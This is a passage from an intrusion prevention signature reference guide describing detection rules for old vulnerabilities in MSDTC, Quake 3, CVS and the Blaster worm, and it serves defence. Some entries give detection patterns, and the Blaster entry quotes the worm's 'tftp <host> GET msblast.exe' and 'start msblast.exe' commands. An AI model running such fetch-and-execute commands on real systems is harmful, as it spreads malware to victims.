TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94

with Microsoft SQL Server 6.5 and higher. There exists a vulnerability, which can be exploited by a remote attacker by
sending 200 NULL bytes. This results in crashing the MSDTC service.
Signature ID: 10185
Quake 3 Arena Possible Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2001-1289
Bugtraq: 3123 Nessus: 10931
Signature Description: Quake3 Arena Server is a software package designed to host multiple Quake 3 players over a
network for interactive play. A vulnerability exists in this software that can allow a malicious user to remotely crash a
Quake 3 Server and execute arbitrary code by sending a specially crafted login string.
Signature ID: 10186
CVS Entry Line Flag Remote Heap Overflow
Threat Level: Information
Industry ID: CVE-2004-0396 Bugtraq: 10384 Nessus: 13701,13706,12495,14147,14498
Signature Description: The Concurrent Versions System (CVS) server is a source control system that allows developers
to share, control and track changes in a central source repository. CVS versions 1.1.15 and below contain an error in
the handling of flags during entry line insertion. This error allows heap data to be overflowed. An attacker could exploit
this vulnerability to execute arbitrary code in the context of the CVS process, which is usually root. At a minimum, heap
corruption will result in a segmentation fault, causing a denial of service. This rule hits when traffic to destination
port 2401 contains the content "Entry" with the content "set" present within 50 bytes.
Signature ID: 10187
CVS Entry Line Flag Remote Heap Overflow
Threat Level: Information
Industry ID: CVE-2004-0396 Bugtraq: 10384 Nessus: 13701,13706,12495,14147,14498
Signature Description: The Concurrent Versions System (CVS) server is a source control system that allows developers
to share, control and track changes in a central source repository. CVS versions 1.1.15 and below contain an error in
the handling of flags during entry line insertion. This error allows heap data to be overflowed. An attacker could exploit
this vulnerability to execute arbitrary code in the context of the CVS process, which is usually root. At a minimum, heap
corruption will result in a segmentation fault, causing a denial of service. This rule hits when an attacker sends a long
string on TCP port 2401.
Signature ID: 10188
Blaster Worm Command Shell Attack
Threat Level: Information
Industry ID: CVE-2003-0352 Bugtraq: 8205 Nessus: 11808
Signature Description: The Blaster worm propagates via the Microsoft Windows DCOM RPC Interface Buffer
Overrun Vulnerability. The worm opens a command shell on the victim host on TCP port 4444. It issues the commands
"tftp <host> GET msblast.exe" and "start msblast.exe" over the command shell. The command shell is closed once the
attacking host disconnects.
A Windows Distributed Component Object Model (DCOM) Remote Procedure
Call (RPC) interface in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 is vulnerable to a buffer overflow
condition. Successful exploitation of the vulnerability could allow execution of arbitrary code using SYSTEM
privileges.
Signature ID: 10189
Blaster Worm Command Shell Attack
Threat Level: Information
Industry ID: CVE-2003-0352 Bugtraq: 8205 Nessus: 11808